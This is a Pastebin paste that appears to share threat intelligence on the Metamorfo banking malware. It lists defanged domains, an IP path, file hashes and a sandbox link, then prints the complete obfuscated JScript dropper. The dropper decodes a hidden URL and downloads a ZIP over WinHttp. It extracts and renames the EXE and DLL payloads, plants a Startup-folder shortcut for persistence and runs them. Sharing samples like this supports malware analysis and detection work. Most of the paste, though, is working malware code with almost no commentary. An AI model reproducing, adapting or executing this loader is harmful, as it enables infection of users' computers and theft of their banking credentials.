API tools faq
paste
Advertisement
1ZRR4H

Metamorfo / 13-03-2020

1ZRR4H
Mar 15th, 2020
2,093
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.72 KB | None | 0 0
raw download clone embed print report
  1. IOC's:
  2. noticiasdelestado[.]xyz/
  3. mycameraxp2020[.]hopto[.]org
  4. sahakorn[.]dusit[.ac[.]th
  5. webhost[.]dusit[.]ac[.]th
  6. 3[.]136[.]20[.]196/uff/MZX4GA C4C4ZCI65[.]php
  7. 1bbad57911e27bdf7a7462911c00c32183ce0dc09ffaf9006582ce9618041e0a
  8. 9692a12baf2113db4921678f3cf8746933d26d05141748fe09dcef11e5d94f54
  9. 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  10. 1c323d32ebe66297018940e11a16b4a3737a79a46d39f52b3b39d7e1c32a3eb7
  11.  
  12. SANDBOX:
  13. https://app.any.run/tasks/f7e9c0c4-c8b7-492d-9069-7c01c10bc932/
  14.  
  15. var _0x3374, _0x3671, _0x351D, _0x39C3, _0x3572, _0x3A6D, _0x341E, _0x371B, _0x37C5, _0x381A, _0x38C4, _0x35C7, _0x33C9, _0x3AC2, _0x386F, _0x32CA, _0x3770, _0x3B17, _0x34C8, _0x3919, _0x3A18, _0x34C8, _0x361C, _0x396E, _0x36C6, _0x3473, _0x331F;
  16. (function() {
  17. var _0x3B6C = ["\x67\x65\x74\x54\x69\x6D\x65", "", "\x45\x55\x43\x43\x44\x50\x33\x35\x38\x35\x38\x46\x46\x4B\x54", "\x34\x35\x45\x38\x30\x38\x33\x46\x45\x43\x32\x34\x30\x45\x30\x45\x30\x38\x34\x33\x39\x31\x43\x31\x36\x35\x39\x36\x34\x44\x45\x42\x31\x46\x31\x38\x33\x46\x46\x37\x32\x46\x43\x38\x30\x45\x30\x39\x35\x32\x38\x30\x39\x36\x34\x44\x46\x33\x36\x38\x43\x45\x42\x42\x42\x39\x41\x43\x39\x38\x34\x37\x32\x41\x41\x43\x43\x32\x33\x33\x41\x39\x43\x44\x30\x36\x37\x33\x38\x33\x39\x33\x38\x43\x35\x31\x46\x38\x36\x46\x41\x30\x42\x42\x44\x39\x30\x41\x36\x34\x41\x44\x31\x41\x32\x35\x32\x42\x44\x32\x35\x32\x46\x39\x33\x36\x33\x43\x32\x39\x45\x35\x30\x42\x34\x38", "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39", "\x57\x69\x6E\x48\x74\x74\x70\x2E\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2E\x35\x2E\x31", "\x47\x45\x54", "\x53\x74\x61\x74\x75\x73", "\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79", "\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D", "\x54\x79\x70\x65", "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74", "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E", "\x2E", "\x2E\x65\x78\x65", "\x2E\x64\x6C\x6C", "\x48\x57\x4C\x4C\x46\x44\x39\x31\x30\x34\x33\x45\x42\x42\x50", "\x2E\x7A\x69\x70", "\x37\x32\x46\x30\x37\x45\x39\x39\x42\x36\x34\x33\x45\x35\x36\x36\x46\x38\x35\x33\x38\x31\x44\x36\x37\x44\x39\x38\x34\x36\x46\x33\x31\x35\x32\x34", "\x5C\x57\x45\x49\x48\x41\x4C\x37\x38\x32\x38\x31\x41\x43\x4B\x4D", "\x49\x46\x44\x59\x54\x58\x35\x30\x37\x33\x38\x4E\x58\x49\x41", "\x5C\x49\x55\x4D\x50\x4C\x41\x34\x34\x33\x36\x39\x44\x41\x42\x54", "\x5C", "\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C", "\x42\x35\x34\x43\x39\x35\x42\x35\x36\x42\x39\x42\x34\x31\x38\x32", "\x2E\x6C\x6E\x6B", "\x20", "\x4D\x4E\x4D\x4C\x44\x55\x36\x35\x33\x39\x31\x4D\x54\x4E\x45", "\x63\x61\x6C\x63\x2E\x65\x78\x65\x2C\x20\x30"];
  18.  
  19. function _0x3BC1(_0x32CA) {
  20. var _0x331F = new Date();
  21. var _0x33C9 = 0;
  22. while (_0x33C9 < (_0x32CA * 1000)) {
  23. var _0x3374 = new Date();
  24. var _0x33C9 = _0x3374[_0x3B6C[0]]() - _0x331F[_0x3B6C[0]]()
  25. }
  26. }
  27.  
  28. function _0x3C16(_0x3572) {
  29. if (_0x3572 == _0x3B6C[1]) {
  30. return
  31. };
  32. var _0x341E = _0x351D.length;
  33. var _0x3374 = -1;
  34. var _0x331F = 0;
  35. var _0x34C8 = _0x3B6C[1];
  36. var _0x33C9 = 0;
  37. var _0x32CA = 0;
  38. var _0x3473 = 0;
  39. _0x331F = parseInt(_0x3572.substr(0, 2), 16);
  40. for (_0x33C9 = 2; _0x33C9 < _0x3572.length; _0x33C9 += 2) {
  41. _0x32CA = parseInt(_0x3572.substr(_0x33C9, 2), 16);
  42. if (_0x3374 < _0x341E - 1) {
  43. _0x3374++
  44. } else {
  45. _0x3374 = 0
  46. };
  47. _0x3473 = _0x32CA ^ _0x351D.charCodeAt(_0x3374);
  48. if (_0x3473 <= _0x331F) {
  49. _0x3473 = 255 + _0x3473 - _0x331F
  50. } else {
  51. _0x3473 = _0x3473 - _0x331F
  52. };
  53. _0x34C8 += String.fromCharCode(_0x3473);
  54. _0x331F = _0x32CA
  55. };
  56. return _0x34C8
  57. }
  58.  
  59. function _0x3C6B(_0x3374) {
  60. var _0x32CA = _0x3B6C[1];
  61. var _0x33C9 = _0x3B6C[4];
  62. for (var _0x331F = 0; _0x331F < _0x3374; _0x331F++) {
  63. _0x32CA += _0x33C9.charAt(Math.floor(Math.random() * _0x33C9.length))
  64. };
  65. return _0x32CA
  66. }
  67.  
  68. function _0x3CC0(_0x3374, _0x33C9) {
  69. var _0x32CA;
  70. var _0x341E;
  71. try {
  72. var _0x331F = new ActiveXObject(_0x3B6C[5]);
  73. _0x331F.SetTimeouts(30000, 30000, 30000, 5000);
  74. void(((_0x331F.Open(_0x3B6C[6], _0x3374, false))));
  75. _0x331F.Send();
  76. if (_0x331F[_0x3B6C[7]] == 404) {
  77. return false
  78. };
  79. _0x32CA = _0x331F[_0x3B6C[8]]
  80. } catch (ex) {
  81. return false
  82. };
  83. _0x341E = new ActiveXObject(_0x3B6C[9]);
  84. _0x341E[_0x3B6C[10]] = 1;
  85. _0x341E.Open();
  86. _0x341E.Write(_0x32CA);
  87. _0x341E.SaveToFile(_0x33C9, 2);
  88. _0x341E.Close();
  89. return true
  90. }
  91.  
  92. function _0x3D15(_0x3374, _0x33C9) {
  93. var _0x331F = new ActiveXObject(((_0x3B6C[11]))),
  94. _0x341E = new ActiveXObject((_0x3B6C[12])),
  95. _0x32CA, _0x3473;
  96. if (!_0x33C9) {
  97. _0x33C9 = _0x3B6C[13]
  98. };
  99. if (!_0x331F.FolderExists(_0x33C9)) {
  100. _0x331F.CreateFolder(_0x33C9)
  101. };
  102. _0x32CA = _0x341E.NameSpace(_0x331F.getFolder(_0x33C9).Path);
  103. _0x3473 = _0x341E.NameSpace(_0x331F.getFile(_0x3374).Path);
  104. if (_0x331F.FileExists(_0x3374)) {
  105. _0x32CA.CopyHere(_0x3473.Items(), 4 + 16);
  106. _0x331F.deletefile(_0x3374)
  107. }
  108. }
  109.  
  110. function _0x3D6A(_0x32CA) {
  111. var _0x341E, _0x34C8, _0x3374, _0x331F, _0x351D;
  112. _0x34C8 = new ActiveXObject(((_0x3B6C[11])));
  113. var _0x3473;
  114. _0x3473 = new ActiveXObject(((_0x3B6C[11])));
  115. _0x341E = new ActiveXObject(((_0x3B6C[11])));
  116. _0x3374 = _0x341E.GetFolder(_0x32CA);
  117. _0x331F = new Enumerator(_0x3374.files);
  118. _0x351D = _0x3B6C[1];
  119. for (; !_0x331F.atEnd(); _0x331F.moveNext()) {
  120. if (_0x331F.item().size >= 1000009) {
  121. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x35C7);
  122. _0x33C9 = _0x32CA + _0x35C7
  123. } else {
  124. if (_0x331F.item().size < 10009) {
  125. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x381A);
  126. _0x386F = _0x32CA + _0x381A
  127. } else {
  128. if (_0x331F.item().size < 1000009 & _0x331F.item().size > 300009) {
  129. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x37C5);
  130. _0x3AC2 = _0x32CA + _0x37C5
  131. }
  132. }
  133. }
  134. };
  135. return _0x351D
  136. }
  137. _0x3374 = _0x3BC1;
  138. _0x3671 = _0x3C16;
  139. _0x3572 = _0x3C6B;
  140. _0x3A6D = _0x3CC0;
  141. _0x341E = _0x3D15;
  142. _0x3B17 = _0x3D6A;
  143. _0x351D = _0x3B6C[2];
  144. _0x39C3 = _0x3C16(_0x3B6C[3]);
  145. _0x371B = _0x3C6B(8);
  146. _0x37C5 = _0x3C6B(8) + (_0x3B6C[14]);
  147. _0x381A = _0x3C6B(8);
  148. _0x38C4 = _0x3C6B(8);
  149. _0x35C7 = _0x38C4 + (_0x3B6C[15]);
  150. _0x32CA = _0x3B6C[16] + (_0x3B6C[17]);
  151. _0x3770 = _0x3C16(_0x3B6C[18]);
  152. _0x3BC1(2);
  153. _0x3BC1(2);
  154. _0x34C8 = new ActiveXObject(_0x3B6C[11]);
  155. if (_0x34C8.FileExists(_0x3770 + _0x3B6C[19])) {
  156. WScript.Quit()
  157. } else {
  158. try {
  159. _0x3919 = new ActiveXObject(_0x3B6C[11]);
  160. _0x3A18 = _0x3919.CreateTextFile(_0x3770 + _0x3B6C[19], true);
  161. _0x3A18.WriteLine(_0x3B6C[20]);
  162. _0x3A18.Close()
  163. } catch (ex) {}
  164. };
  165. _0x3BC1(2);
  166. _0x34C8 = new ActiveXObject(((_0x3B6C[11])));
  167. if (_0x34C8.FolderExists(_0x3770 + _0x3B6C[21])) {} else {
  168. try {
  169. _0x361C = new ActiveXObject(((_0x3B6C[11])));
  170. _0x361C.CreateFolder(_0x3770 + _0x3B6C[22] + _0x371B);
  171. _0x3BC1(2);
  172. _0x396E = new ActiveXObject((_0x3B6C[23]));
  173. KAIEND16015MAVW = _0x396E.SpecialFolders(_0x3C16(_0x3B6C[24]));
  174. _0x36C6 = _0x396E.CreateShortcut(KAIEND16015MAVW + _0x3B6C[22] + _0x3C6B(8) + (_0x3B6C[25]));
  175. _0x36C6.TargetPath = _0x3770 + _0x371B + _0x3B6C[22] + _0x37C5;
  176. _0x36C6.Arguments = _0x3B6C[26] + _0x3770 + _0x371B + _0x3B6C[22] + _0x381A + _0x3B6C[26] + _0x3770 + _0x371B + _0x3B6C[22] + _0x35C7;
  177. _0x36C6.Description = _0x3B6C[27];
  178. _0x36C6.Hotkey = _0x3B6C[1];
  179. _0x36C6.IconLocation = _0x3B6C[28];
  180. _0x36C6.WindowStyle = 7;
  181. _0x36C6.WorkingDirectory = _0x3770 + _0x371B;
  182. _0x36C6.Save()
  183. } catch (ex) {};
  184. _0x3BC1(2);
  185. _0x3BC1(2);
  186. _0x3CC0(_0x39C3, _0x3770 + _0x371B + _0x3B6C[22] + _0x32CA);
  187. _0x3BC1(2);
  188. _0x3BC1(2);
  189. _0x3D15(_0x3770 + _0x371B + _0x3B6C[22] + _0x32CA, _0x3770 + _0x371B + _0x3B6C[22]);
  190. _0x3BC1(2);
  191. _0x3BC1(2);
  192. _0x3BC1(2);
  193. _0x3D6A(_0x3770 + _0x371B + _0x3B6C[22]);
  194. _0x3BC1(2);
  195. _0x3BC1(2);
  196. _0x3473 = new ActiveXObject((_0x3B6C[23]));
  197. _0x331F = new ActiveXObject(((_0x3B6C[11])));
  198. if (_0x331F.FileExists(_0x3AC2)) {
  199. _0x3473.Run(String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x37C5 + String.fromCharCode(34) + String.fromCharCode(32) + String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x381A + String.fromCharCode(34) + String.fromCharCode(32) + String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x35C7 + String.fromCharCode(34))
  200. };
  201. _0x3BC1(11)
  202. }
  203. })()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!